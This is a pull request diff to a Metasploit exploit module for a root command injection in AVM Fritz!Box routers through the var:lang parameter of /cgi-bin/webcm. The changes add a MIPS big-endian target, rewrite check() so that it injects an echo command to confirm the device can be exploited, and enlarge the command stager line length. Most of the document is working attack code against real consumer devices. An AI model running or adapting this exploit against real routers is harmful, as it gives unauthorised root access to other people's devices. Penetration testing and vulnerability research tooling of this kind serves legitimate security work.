### PR TITLE
Fritz!Box exploit: Added Big Endianess, improved check()-Function

### DIFF
--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'      =>
         [
           'unknown', # Vulnerability discovery
-          'Fabian Braeunlein <fabian@breaking.systems>', #Metasploit PoC with wget method
+          'Fabian Braeunlein <fabian@breaking.systems>', # Metasploit PoC with wget method
           'Michael Messner <devnull@s3cur1ty.de>' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
@@ -32,23 +32,32 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'OSVDB', '103289' ],
           [ 'BID', '65520' ],
-          [ 'URL', 'http://www.kapple.de/?p=75' ],                       #vulnerability details with PoC
-          [ 'URL', 'https://www.speckmarschall.de/hoere.htm' ],          #probably the first published details (now censored)
-          [ 'URL', 'http://pastebin.com/GnMKGmZ2' ],                     #published details uncensored from speckmarschall
-          [ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], #vendor site with a list of vulnerable devices
-          [ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] #wirteup with PoC
+          [ 'URL', 'http://www.kapple.de/?p=75' ],                       # vulnerability details with PoC
+          [ 'URL', 'https://www.speckmarschall.de/hoere.htm' ],          # probably the first published details (now censored)
+          [ 'URL', 'http://pastebin.com/GnMKGmZ2' ],                     # published details uncensored from speckmarschall
+          [ 'URL', 'http://www.avm.de/en/Sicherheit/update_list.html' ], # vendor site with a list of vulnerable devices
+          [ 'URL', 'http://breaking.systems/blog/2014/04/avm-fritzbox-root-rce-from-patch-to-metasploit-module-ii' ] # writeup with PoC
         ],
       'DisclosureDate' => 'Feb 11 2014',
       'Privileged'     => true,
       'Platform'       => 'linux',
-      'Arch'           => ARCH_MIPSLE,
       'Payload'        =>
         {
           'DisableNops' => true
         },
       'Targets' =>
         [
-          [ 'Automatic Targeting', { } ],
+          [ 'MIPS Little Endian',
+            {
+              'Arch' => ARCH_MIPSLE,
+            }
+          ],
+          [ 'MIPS Big Endian',
+            {
+              'Arch' => ARCH_MIPS,
+              'Platform' => 'linux'
+            }
+          ],
         ],
       'DefaultTarget'  => 0
       ))
@@ -56,19 +65,23 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     begin
+      clue = Rex::Text::rand_text_alpha(rand(5) + 5)
+
       res = send_request_cgi({
         'uri'    => '/cgi-bin/webcm',
-        'method'  => 'GET'
+        'method'  => 'GET',
+        'vars_get' => {
+          "var:lang" => "&echo -e \"\\n\\n#{clue}\""
+        }
       })
-
-      if res && [200, 301, 302].include?(res.code)
-        return Exploit::CheckCode::Detected
+      if res && res.body =~ /#{clue}/
+        return Exploit::CheckCode::Vulnerable
       end
     rescue ::Rex::ConnectionError
-      return Exploit::CheckCode::Unknown
+      return Exploit::CheckCode::Safe
     end
 
-    Exploit::CheckCode::Unknown
+    Exploit::CheckCode::Safe
   end
 
   def execute_command(cmd, opts)
@@ -89,14 +102,14 @@ class Metasploit3 < Msf::Exploit::Remote
   def exploit
     print_status("#{peer} - Trying to access the vulnerable URL...")
 
-    unless check == Exploit::CheckCode::Detected
+    unless check == Exploit::CheckCode::Vulnerable
       fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
     end
 
     print_status("#{peer} - Exploiting...")
 
     execute_cmdstager(
-      :linemax => 90
+      :linemax => 92
     )
   end
 end


### PR DESCRIPTION
Some Fritz!Box devices also run in Big Endianess mode (e.g. Version 7360). However, since
"uname -a" always returns "mips" and the "file"-command is not
available, autodetection is not an easy task.

The check()-function now checks, whether the device is really
vulnerable.

Furthermore, it's possible to send 92 bytes.
